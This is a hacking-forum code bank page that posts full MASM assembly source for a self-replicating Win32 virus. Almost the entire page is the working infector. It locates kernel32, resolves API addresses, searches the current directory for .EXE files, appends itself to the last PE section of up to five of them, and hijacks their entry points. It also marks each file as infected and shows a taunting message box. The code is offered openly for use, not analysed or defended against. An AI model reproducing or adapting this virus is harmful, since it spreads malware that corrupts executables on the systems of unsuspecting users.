Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.
Win32 Virus - Assembly Code Bank
Win32 Virus
My little win32 virus, that infects .exe files in directory
Compiler--MASM
.386
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
VirusSize equ (offset VirusEnd - offset VirusStart)
.data
OurTitle db "Message",0
OurMessage db "This Is [Win32] Virus",10
db " by EdoVt",0
.code
VirusStart label byte
start:
nop
nop
pushad
pushfd
call delta
delta:
pop ebp
sub ebp,offset delta;; ebp=delta offset
mov eax,[esp+24h];;eax==somewhere in Kernel32( CreateProcess)
call FuckTheK32
call GetAPIz
call Infect
or ebp,ebp
jz @1stGen;;;;;;First Generetion
;;WE Can Fuck This File
;;;Call Of LoadLibrary API
lea eax,[USER32DLL+ebp]
push eax
call [ebp+_LoadLibraryA]
;;;End Call eax==user32.dll handle
;;;Call of GetProcAddress
lea ecx,[MESSAGEBOX+ebp]
push ecx
push eax
call [ebp+_GetProcAddress]
;;;;End Call Eax==MessageBoxA Address
;;;MessageBoxA Call
xor ebx,ebx
push ebx
lea ecx,[MesTitle+ebp]
push ecx
lea ecx,[Mess+ebp]
push ecx
push ebx
call eax
popfd
popad
mov eax,12345678h
org $-4
ImageBase dd 400000h
add eax,12345678h
org $-4
EntryPoint dd 1000h
jmp eax
;;return to the host
push 0
call ExitProcess
Infect:
and [ebp+Infections],00000000h
lea eax,[@WinFindData+ebp]
push eax
lea eax,[SearchMask+ebp]
push eax
call [ebp+_FindFirstFileA]
inc eax
or eax,eax
jz FailInfect
dec eax
mov [ebp+SearchHandle],eax
InfectIt:
push [ebp+EntryPoint]
push [ebp+ImageBase]
call Infection
pop [ebp+ImageBase]
pop [ebp+EntryPoint]
inc [ebp+Infections]
cmp [ebp+Infections],5
jz CloseSearchHandle
;;;;;;;;Its All Right
nop
lea edi,[@WinFindData.cFileName+ebp]
mov ecx,MAX_PATH
xor al,al
rep stosb
lea eax,[ebp+@WinFindData]
push eax
push dword ptr [ebp+SearchHandle]
call [ebp+_FindNextFileA]
or eax,eax
jnz InfectIt
CloseSearchHandle:
push [ebp+SearchHandle]
call [ebp+_FindClose]
FailInfect:
ret
Infection:
lea esi,dword ptr[ebp+@WinFindData.cFileName]
push 80h
push esi
call [ebp+_SetFileAttributesA]
call @OpenFile
inc eax
or eax,eax
jz CantOpen
dec eax;;eax==Current File handle
mov [ebp+FileHandle],eax
xor ecx,ecx
call CreateMap
or eax,eax
jz CloseFile
mov [ebp+MapHandle],eax
mov ecx,[ebp+@WinFindData.nFileSizeLow]
call MapFile
or eax,eax
jz CloseMap
mov [ebp+MapAddress],eax
mov esi,[eax+3ch]
add esi,eax;;;;;PE header in esi
mov eax,esi
cmp word ptr[eax],'EP'
jnz NoInfect
;;;Yeah its PE file
cmp dword ptr [eax-04h],'nooM';;;Is File Infected
jz NoInfect
push dword ptr [eax+3ch]
push dword ptr [ebp+MapAddress]
call [ebp+_UnmapViewOfFile]
push dword ptr [ebp+MapHandle]
call [ebp+_CloseHandle]
pop ecx;;;File ALign
mov eax,[ebp+@WinFindData.nFileSizeLow]
add eax,VirusSize
call @@Align
mov [ebp+NewSize],eax
xchg ecx,eax
call CreateMap
or eax,eax
jz CloseFile
mov [ebp+MapHandle],eax
mov ecx,[ebp+NewSize]
call MapFile
or eax,eax
jz CloseMap
mov [ebp+MapAddress],eax
mov esi,[eax+3ch]
add esi,eax;;;;;PE header in esi
mov edi,esi
add esi,78h;;Pointer to Directory table
mov edx,[edi+74h];;Number of directories
shl edx,3
add esi,edx;;Pointer to 1st section
movzx eax,word ptr [edi+06h]
dec eax
imul eax,eax,28h
add esi,eax;;;;esi =====pointer to last the section
mov eax,dword ptr[edi+28h];;;EntryPoint in eax
mov dword ptr[ebp+EntryPoint],eax
mov eax,dword ptr[edi+34h]
mov dword ptr[ebp+ImageBase],eax
mov edx,dword ptr[esi+10h];;Sizeofrawdata
mov ebx,edx
add edx,dword ptr[esi+14h];;edx=edx+Pointer to raw data
push edx
mov eax,dword ptr[esi+0ch];;eax===last section RVA
add eax,ebx;;;;NewEIP
mov dword ptr [ebp+OurEntryPoint],eax;;;New ENtryPoint
mov dword ptr[edi+28h],eax;;Set New EntryPoint
mov eax,dword ptr[esi+10h];;Size of raw data
add eax,VirusSize
push eax
mov ecx,[edi+3ch]
call @@Align
mov dword ptr[esi+10h],eax;;;New Size of raw data
mov ecx,[edi+038h]
pop eax
call @@Align
shl eax,1
mov dword ptr[esi+08h],eax;;New Virtual Size
pop edx;;;;edx=SizeOfRawData+Pointer to raw data
add eax,dword ptr[esi+0Ch];;eax=eax+RVA(Last Section)
mov dword ptr[edi+50h],eax;;;New SizeOfImage
or dword ptr [esi+24h],0A0000020h;;;New attributes for last section
mov dword ptr [edi-04h],"nooM";;Our LOGO
lea esi,[ebp+start]
mov edi,edx
add edi,[ebp+MapAddress];;;edi=Pointer to place where go our virus
mov ecx,VirusSize
rep movsb
push dword ptr [ebp+MapAddress]
call [ebp+_UnmapViewOfFile]
jmp CloseMap
NoInfect:
dec word ptr [ebp+Infections]
CloseMap:
push dword ptr [ebp+MapHandle]
call [ebp+_CloseHandle]
CloseFile:
push dword ptr [ebp+FileHandle]
call [ebp+_CloseHandle]
CantOpen:
push dword ptr [ebp+@WinFindData.dwFileAttributes]
lea eax,[ebp+@WinFindData.cFileName]
push eax
call [ebp+_SetFileAttributesA]
ret
@@Align proc
xor edx,edx
push eax
div ecx
pop eax
or edx,edx
jz Enough
sub ecx,edx
add eax,ecx
Enough: ret
@@Align endp
MapFile proc
xor eax,eax
push ecx
push eax
push eax
push 02h
push [ebp+MapHandle]
call [ebp+_MapViewOfFile]
ret
MapFile endp
CreateMap proc
xor eax,eax
push eax
push ecx
push eax
push 04h
push eax
push [ebp+FileHandle]
call [ebp+_CreateFileMappingA]
ret
CreateMap endp
@OpenFile proc;;esi=pointer to the file name
xor eax,eax
push eax
push eax
push 03h
push eax
push 01h
push 80000000h or 40000000h
push esi
call [ebp+_CreateFileA]
ret
@OpenFile endp
FuckTheK32 proc;;eax==somewhere in Kernel32( CreateProcess)
@loop:
cmp word ptr [eax],"ZM";;Is It MZ header
jz WeGotK32MZ
dec eax;
jmp @loop;;loop
WeGotK32MZ:
mov [Kernel_MZ+ebp],eax
add eax,3ch;;[eax] === PE header offset
mov eax,[eax];;eax===PE header offset
add eax,[ebp+Kernel_MZ];;;Normalize
cmp word ptr [eax],"EP"
jz WeGotK32
;;;Call of ExitProcess
push 0
call ExitProcess
WeGotK32:
cld
mov [Kernel_PE+ebp],eax
mov esi,eax;;esi=Kernel_PE
add esi,78h
lodsd;;;; eax=RVA of Export Table
add eax,[Kernel_MZ+ebp];;;Normalize
mov esi,eax
add esi,1ch
lodsd;;;eax==RVA of Export Address table
add eax,[Kernel_MZ+ebp];;Normalize that
mov [ExpAddrTableVA+ebp],eax;;Keeping
lodsd;;eax==RVA of Export Names pointer table
add eax,[Kernel_MZ+ebp];;Normalizing
mov [ExpNameTableVA+ebp],eax
lodsd
add eax,[Kernel_MZ+ebp]
mov [ExpOrdinalTableVA+ebp],eax
ret
FuckTheK32 endp
;;;;;;;;;;;;;;;;;Function to Get the APIs Addressis
GetAPIz proc
cld
lea ebx,[OurAPIz+ebp]
lea edi,[OurFuncz+ebp]
begin:
push edi
mov [Counter+ebp],0
xor ecx,ecx
mov esi,ebx
@_1: lodsb
inc ecx
or al,al
jnz @_1
mov edx,ecx
mov edi,ebx
mov esi,[ExpNameTableVA+ebp]
push esi
@_2:lodsd
mov esi,eax
add esi,[Kernel_MZ+ebp]
repe cmpsb
jz TheyAreEqual
pop esi
add esi,4
push esi
mov edi,ebx
mov ecx,edx
inc word ptr [Counter+ebp]
jmp @_2
TheyAreEqual:
pop esi
pop edi
xor esi,esi
add ebx,edx
xor eax,eax
mov si,[Counter+ebp]
shl esi,1
add esi,[ExpOrdinalTableVA+ebp]
lodsw
mov esi,eax
shl esi,2
add esi,[ExpAddrTableVA+ebp]
lodsd
add eax,[Kernel_MZ+ebp]
stosd
cmp dword ptr [ebx],"jreV"
jnz begin
ret
GetAPIz endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Functions End
Infections db 0
OurEntryPoint dd 1000h
Counter dw 0
USER32DLL db "user32.dll",0
MESSAGEBOX db "MessageBoxA",0
MesTitle db "Got Ya !!!!!!!!!!!!!",0
Mess db "Everything under the sun is in tune,",10
db "But the sun is eclipsed by the MOON.",10
db " Pink Floyd",10,10
db "This File Is Infected By ",0
SearchMask db '*.EXE',0
OurAPIz label byte
@FindFirstFileA db "FindFirstFileA",0
@FindNextFileA db "FindNextFileA",0
@FindClose db "FindClose",0
@CloseHandle db "CloseHandle",0
@CreateFileA db "CreateFileA",0
@SetFilePointer db "SetFilePointer",0
@SetFileAttributesA db "SetFileAttributesA",0
@CreateFileMappingA db "CreateFileMappingA",0
@MapViewOfFile db "MapViewOfFile",0
@UnmapViewOfFile db "UnmapViewOfFile",0
@SetEndOfFile db "SetEndOfFile",0
@LoadLibraryA db "LoadLibraryA",0
@GetProcAddress db "GetProcAddress",0
db "Verj",0
VirusEnd label byte
OurFuncz label byte
_FindFirstFileA dd 0
_FindNextFileA dd 0
_FindClose dd 0
_CloseHandle dd 0
_CreateFileA dd 0
_SetFilePointer dd 0
_SetFileAttributesA dd 0
_CreateFileMappingA dd 0
_MapViewOfFile dd 0
_UnmapViewOfFile dd 0
_SetEndOfFile dd 0
_LoadLibraryA dd 0
_GetProcAddress dd 0
@WinFindData WIN32_FIND_DATA <>
SearchHandle dd ?
FileHandle dd ?
MapHandle dd ?
MapAddress dd ?
NewSize dd ?
OurDelta dd ?
HostStart dd ?
Kernel_MZ dd ?
Kernel_PE dd ?
ExpAddrTableVA dd ?
ExpNameTableVA dd ?
ExpOrdinalTableVA dd ?
@1stGen:
popfd
popad
xor eax,eax
push eax
push offset OurTitle
push offset OurMessage
push eax
call MessageBoxA
push 0
call ExitProcess
end start
Comments
Sorry but there are no comments to display